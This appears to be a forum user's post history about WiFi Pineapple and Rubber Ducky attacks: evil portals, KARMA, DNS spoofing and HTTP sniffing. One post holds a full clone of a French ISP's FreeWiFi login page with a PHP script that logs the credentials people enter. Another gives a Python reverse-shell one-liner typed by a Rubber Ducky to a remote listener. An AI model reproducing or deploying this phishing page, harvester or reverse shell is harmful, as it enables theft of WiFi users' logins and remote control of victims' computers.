Posts posted by carmelo42

  1. Hello,

    I'm trying to set up evil portal with credential harvester.

    So I have duplicated a wifi hotspot identification page, and I use it as my evil portal splash page.

    But, in this identification page, I have an "ok" button, which redirects to a post.php page: this page writes the txt file with the credentials entered ...

    But as I have not reached the $authtarget page, the client stays unconnected, and even the post.php cannot be reached ...

    Do you have any idea?

    Here is my splash page :

    <!DOCTYPE html>
    <html><head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=400, user-scalable = no">
    <title></title>
    <link rel="stylesheet" type="text/css" href="http://172.16.42.1/freewifi_fichiers/small.css" media="screen">
    </head>
    <body>
    <div id="header">
      <div id="header_c">
        <div id="top">
          <div id="top-menu"><img src="http://172.16.42.1/freewifi_fichiers/logo2.png" alt="Free" height="112" width="232"></div>
        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div id="bod">
      <div id="bod_c">
        <div id="block">
          <h1>CONNEXION AU SERVICE <span class="red">FreeWiFi</span></h1>
          <br>
          <div id="block_2">
            <p>Pour vous connecter au service FreeWiFi, <br>
              utilisez les identifiants que vous avez configurés lors de votre premier accès au service<br>
            </p><form id="form1" name="form1" method="post" action="post.php">
              <label for="login" class="label"> IDENTIFIANT</label>
              <input name="login" id="login" class="input_r" required>
              <br>
              <br>
              <br>
              <label for="password" class="label"> MOT DE PASSE</label>
              <input name="password" id="password" class="input_r" value="" type="password" required>
              <br>
              <br>
              <br>
    <!--          <a href="#" class="label" style="padding-top:0px;"><img src="/im/help.png" alt="ASSISTANCE" width="37" height="40" border="0"  /></a>
    -->
    <!--	  <input name="priv" id="priv" type="hidden"  value="" /> -->
              <input name="submit" value="Valider" class="input_b" type="submit">
            </form>
            
         
             <div class="clearer"></div> 
          </div>
    
          <a href="https://wifi.free.fr/?priv=$PRIV_SUB"><img src="http://172.16.42.1/freewifi_fichiers/abo.jpg" alt="Vous n'êtes pas abonné FREE? Cliquez ici et dans une minute, vous pourrez accéder à internet" border="0" height="70" width="399"></a></div>
      </div>
    </div>
    
    
    </body></html>
    

    Here is my post.php page :

    <?php $file = 'harvester_2014-09-22 20:12:59.594540.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=/etc/nodogsplash/htdocs/$authtarget" />
    
  2. Hi guys,

    I have tried but I can't make it work :(

    Can someone explain how to use (briefly) PineAP ?

    I want the client to auto-connect to my pineapple, without selecting it in their wireless preferences (like Karma with previous firmware)

    A quick "PineAP use guide" like: on the PineAP tile, click "enable", and after ...

    Please I need some help :)

  3. Something goes wrong ... I can't get karma or PineAP running ...

    So on the MV, we have 3 network interfaces :

    - LAN

    - WLAN0

    - WLAN1

    I connect my "evil" PC to the pineApple through ethernet.

    I connected via Wifi Manager v2.1 radio0 to my regular SSID, which provides internet to the pineapple

    I want to use radio1 to "karma" victims ...

    Maybe I'm wrong?

  4. Hello,

    I am trying to do this scenario :

    1) With KARMA, I want some clients to get auto-connected to my pineapple

    2) With DNSSpoof, I redirect all the clients to my fake wifi authentication page, which is on my Kali Laptop. The fake wifi page logs the credentials entered by the 'victim'.

    3) The victim is redirected through internet and can navigate as if it was on the real wifi authentication page (the pineapple is connected to internet with WLAN1 as client)

    Is this even possible ?

    A little schema attached ;)

    thanks,

    Carmelo

  5. Hello guys,

    I'm trying to have fun with DNS Spoof but I have some problems ...

    In the DNSSpoof conf, I have this :

    172.16.42.1 microsoft.com

    I activate DNSSpoof, navigate on microsoft.com with my browser, the pine apple html page appears. It works.

    But, if I deactivate DNSSpoof from the PineApple, my browser continues to go into the pine apple page when I want to reach microsoft.com ...

    Even with DNSSpoof off !

    What can I do ?

    Thanks

    Carmelo

  6. Hi guys !

    I've just received my Rubber Ducky.

    I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac.

    I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (I'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing: the ~ character does not print.

    Does somebody have an idea?

    Same problem here with a french mac keyboard.

    I have encoded my ducky script with the resource frmac.properties.

    Here is what my ducky writes :

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.37,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);'
    

    Here is what I have in my script :

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.37",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    
  7. Is it an open WIFI network?

    Nope, it's WPA2 protected, but as it's mine, I'm in !

    If you MITM the target, regardless of wireless or wired, you should see all of its traffic and then just use HTTP as the display filter in wireshark to see only http traffic. If it's OpenWifi, then put the card sniffing into monitor mode and you should be able to see its traffic if it's not encrypted in any way. If in WEP or WPA, then you need to MITM the other node.

    What I don't understand : do I have to be connected on the wireless network BEFORE putting the card into monitor mode ? And in wireshark what interface do I have to listen ? wlan0 ? mon0 ?

  8. Hello guys and girls :)

    So I'm trying to sniff HTTP with wireshark :

    - I have an ALFA 500 wireless card, connected to my pentest computer

    - the alfa card is connected on my wifi network.

    - I want to sniff HTTP that comes from my 2nd computer, which is on the same wireless network.

    How can I do this ?

    (It's working very well if my pentest computer is ethernet connected)
